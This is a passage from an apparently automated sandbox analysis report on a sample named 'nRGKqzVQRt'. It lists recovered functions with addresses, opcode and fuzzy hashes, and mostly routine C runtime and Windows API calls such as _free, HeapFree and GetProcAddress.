                                                  • API String ID: 0-3196406043
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: a85045274d48d28c8ce328669d6906ebec8b1e7313b4a5a92ae3c5f5948c46f5
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: BD118B72340100AFDB54DF59DC81FA673EAEB89360B2980A5ED08CB316E779EC02C760
                                                  Function 0041C9A9 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                  • Instruction ID: d0e7df19af42a2597c1c9a0a4d59ec128da6f77e801e7a5f5831370ed6b1a342
                                                  • Opcode Fuzzy Hash: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                  • Instruction Fuzzy Hash: 50321672E65F014DD7239634C86233A6249AFB73C4F55D737F81AB5AA5EB29C4C34104
                                                  Function 00449A55 Relevance: .4, Instructions: 355COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                  • Instruction ID: 62ddf0f539a61fe362f3fc0ba911e904fc0541fcde171f6a6d6dbec24995197b
                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                  • Instruction Fuzzy Hash: CDC19473D0E5F3469B35452D055823FEEA26E81B4132FC3D6DCD03F28AC62A6D01A6D8
                                                  Function 0044966D Relevance: .3, Instructions: 349COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                  • Instruction ID: 25b8650a2cf9ca21f7bb2be8a46dff98435e19c08d2377397bd677c178433d5c
                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                  • Instruction Fuzzy Hash: E7C1B473D1A5F386DB35452D051823FEE626E91B4132FC396CCD03F39AD62A6D01A6D8
                                                  Function 0044929B Relevance: .3, Instructions: 332COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                  • Instruction ID: 5fe4683abeec6dd53c9186c9ea3dba8c7b2ddbb973b4a3a3d525454f4ced2ac3
                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                  • Instruction Fuzzy Hash: F8C19333D0F5F2879B36452D451823FEE616E81B4132F8396CCD03F69AD62A6D06A6D8
                                                  Function 00420944 Relevance: .3, Instructions: 327COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  • Opcode ID: 9637478f7503b63ea53ab8483ff2b13938b4887820308a3a1b22a451d918574a
                                                  • Instruction ID: c11220bdc84f0dd27eb771944182a56a06f2eba990a86c6701f9ca16453aea29
                                                  • Opcode Fuzzy Hash: 9637478f7503b63ea53ab8483ff2b13938b4887820308a3a1b22a451d918574a
                                                  • Instruction Fuzzy Hash: 6CB128756007118BDB389B65DCC2AB7B3E9EF54308F94452FE983C6642E678F986C708
                                                  Function 00680BAB Relevance: .3, Instructions: 327COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  • Opcode ID: bc8b9a7b4de513b6833ccc6202e639fa52809b2a80a517f60166b00b34b4851b
                                                  • Instruction ID: b83771c7a0ba9639ca14f99d62c0474ad4c155d5f713e813a7bf6e50a00cdd28
                                                  • Opcode Fuzzy Hash: bc8b9a7b4de513b6833ccc6202e639fa52809b2a80a517f60166b00b34b4851b
                                                  • Instruction Fuzzy Hash: 69B12B755007019FEB78AF24CC92AF7B3EAEF44304F144E6DEA87C6640EA75A989C714
                                                  Function 00448EFD Relevance: .3, Instructions: 326COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                  • Instruction ID: 4a5650e53ad3b194ac431d657283c2806adc1ad088b25dc02e29fa1ee6cafad7
                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                  • Instruction Fuzzy Hash: 0BB19533D0A4F346A775452D051823FEE626E91B4032FC3D6DCD03F68ADA2A6D05A6D8
                                                  Function 00685066 Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction ID: c2a6b4ca4ed47aa3f68bd30a03a2ec961b3334928326c202ed327f89064bb833
                                                  • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction Fuzzy Hash: 1921B673F2093947770CC47E8C5627DB6E1C68C601745423EF8A6EA2C1D968D917E2E4
                                                  Function 00424CDF Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction ID: 54cccbac12d7b0a806302a64698748c03833c4b2bf86144adce5760e1b7c8ced
                                                  • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction Fuzzy Hash: 9511A333F30C255A675C81698C172BAA1D2EBD824034F533AD826EB284E9A4DE23D290
                                                  Function 00684F46 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction ID: 227dbde4454c41fa39b0f6d3b3892cc549f560abf996e945d553e775a527903a
                                                  • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction Fuzzy Hash: 5511A323F30C255A675C81698C172BAA1D2EBD824034F533ED826E7284E9A4DE13D290
                                                  Function 0040E990 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 1c530e7fa6924d9775cb3f61f4bfdae9f72d3837fde0802971f232fe1001d1b0
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 22112BF730105183D6A4863FC8B46B7A795FBCA32072C4B7BE1816B7D4D13AE965DA08
                                                  Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                                  Function 0066EBF7 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 85fee3f2e8af9a6ebd7aea2a720af6c16bc184e8b2414a8ff4de091aa09b0c6c
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 65110A7F20014247E6188A7DD5B46F7AB97FBC532173D437AD0B24B758D223E9559600
                                                  Function 00660D90 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: a60c24d993cbccf98a249165d32e4b252ecb079773f30f13a6df0b1f2fa8fb70
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 1A018F76A006148FEB21CF64C804BEB33AAEF86316F4545B5D90A97281E774A9418B90
                                                  Function 0041B919 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction ID: 91f9cbf9c998b6b154933009beec7cf969d7c2669516eed5026d1d53449b0fde
                                                  • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction Fuzzy Hash: F9E08C72921268EBCB14DBC9CA0498AF3ECEB45B54B1504ABF601D3200C278DE41C7D4
                                                  Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                  • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                  Function 0067BB80 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction ID: b58ca36229bfd2519ce0c05b71bf02d2c810429cf343892cbcb61b77e4193808
                                                  • Opcode Fuzzy Hash: 49cb94a3bcbf570ab7a683de86508d9cb72f1b21a63cda5ac60ca76d38988586
                                                  • Instruction Fuzzy Hash: E2E08C32A11228EBCB25DB98CD04A8AF3EDEB44F00B11849AB905D3200C670DE00CBE0
                                                  Function 006806E1 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00680725
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9AA
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9BC
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9CE
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9E0
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067F9F2
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA04
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA16
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA28
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA3A
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA4C
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA5E
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA70
                                                    • Part of subcall function 0067F98D: _free.LIBCMT ref: 0067FA82
                                                  • _free.LIBCMT ref: 0068071A
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 0068073C
                                                  • _free.LIBCMT ref: 00680751
                                                  • _free.LIBCMT ref: 0068075C
                                                  • _free.LIBCMT ref: 0068077E
                                                  • _free.LIBCMT ref: 00680791
                                                  • _free.LIBCMT ref: 0068079F
                                                  • _free.LIBCMT ref: 006807AA
                                                  • _free.LIBCMT ref: 006807E2
                                                  • _free.LIBCMT ref: 006807E9
                                                  • _free.LIBCMT ref: 00680806
                                                  • _free.LIBCMT ref: 0068081E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: qC$PrC
                                                  • API String ID: 161543041-1020004248
                                                  • Opcode ID: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                  • Instruction ID: d9d121808e5c0c25f0a502ecfdb3cf6c0fdb3c9d5232a1f72ce3e692ec3ac8f7
                                                  • Opcode Fuzzy Hash: 1dfb0f945daf1fa0b5fb901f111b8d9716e603e26c88d85824bdef020c61cf24
                                                  • Instruction Fuzzy Hash: 67312E715047059FFBA1BA38D846B9773EAAF00720F14892DE169D7261DB74BC84CF64
                                                  Function 0042047A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 004204BE
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F743
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F755
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F767
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F779
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F78B
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F79D
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7AF
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7C1
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7D3
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7E5
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F7F7
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F809
                                                    • Part of subcall function 0041F726: _free.LIBCMT ref: 0041F81B
                                                  • _free.LIBCMT ref: 004204B3
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 004204D5
                                                  • _free.LIBCMT ref: 004204EA
                                                  • _free.LIBCMT ref: 004204F5
                                                  • _free.LIBCMT ref: 00420517
                                                  • _free.LIBCMT ref: 0042052A
                                                  • _free.LIBCMT ref: 00420538
                                                  • _free.LIBCMT ref: 00420543
                                                  • _free.LIBCMT ref: 0042057B
                                                  • _free.LIBCMT ref: 00420582
                                                  • _free.LIBCMT ref: 0042059F
                                                  • _free.LIBCMT ref: 004205B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID: tqC
                                                  • API String ID: 161543041-1967669507
                                                  • Opcode ID: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                  • Instruction ID: 89d3e0614c1888e3876d50c63e7448c9468b58a50f4c13281cf391deb725330b
                                                  • Opcode Fuzzy Hash: 5f0003f8893cf8ce982a8c0a223b8adfc5b53c17a0bd4eaaadfeec6f99f588fe
                                                  • Instruction Fuzzy Hash: 89315D71701615AFEB20AA79E845B9B73E8AF00314F50841BE458D7252DB78EDC0CB29
                                                  Function 0041F824 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 373COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC
                                                  • API String ID: 269201875-1967669507
                                                  • Opcode ID: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                  • Instruction ID: a4bface3bf681dc86b1305e01607c601c26d64039dea510868fa8c22d2e6bb15
                                                  • Opcode Fuzzy Hash: 2e35bd67042b9c7ced78a83742b0d05a9d7f14c4418e5b4e63d8796d7c15fdff
                                                  • Instruction Fuzzy Hash: 72C12771E40205ABDB20DB99CC42FDF77F89F48704F54416AFA05FB282E674AD858BA4
                                                  Function 00415430 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                  • Instruction ID: 1d6b25825914aaa7f5d743abe57cff5c904706fedcceaf39c4cb1f3fede375c7
                                                  • Opcode Fuzzy Hash: 539b19e4f89500baa8e73471446f1730a4e52e978371ab8d2f9639197e0c27fd
                                                  • Instruction Fuzzy Hash: 8BD19C71E00605DFDB11DFA9C881BEEBBB5BF48304F14452EE495A7382D778A885CB68
                                                  Function 00675697 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                  • Instruction ID: f308487b9ac1238e9615664e10754519775a025b785c0d40311dd0589d4ddc3a
                                                  • Opcode Fuzzy Hash: 16a18909ecb7dbd131bbabdc069eeb86cdd151f6d1a3fa90edba1b0967e13438
                                                  • Instruction Fuzzy Hash: CFD19D719006069FDB11DFB8C881BEEBBF6BF08310F14856DE599A7392D7B1A845CB60
                                                  Function 0040D024 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0040D002), ref: 0040D030
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040D002), ref: 0040D03B
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040D002), ref: 0040D04C
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040D05E
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040D06C
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040D002), ref: 0040D08F
                                                  • DeleteCriticalSection.KERNEL32(004383D4,00000007,?,?,0040D002), ref: 0040D0AB
                                                  • CloseHandle.KERNEL32(00000000,?,?,0040D002), ref: 0040D0BB
                                                  Strings
                                                  • WakeAllConditionVariable, xrefs: 0040D064
                                                  • SleepConditionVariableCS, xrefs: 0040D058
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040D036
                                                  • kernel32.dll, xrefs: 0040D047
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction ID: f37fac1021100a0b07756b465630dd6bb0a8df6e755d874f23fa7dde75435285
                                                  • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction Fuzzy Hash: C8014431B427215BDA311BB57C0DB5B76989B44B51F55403ABD08E23D4DF79880A866C
                                                  Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 1000A045
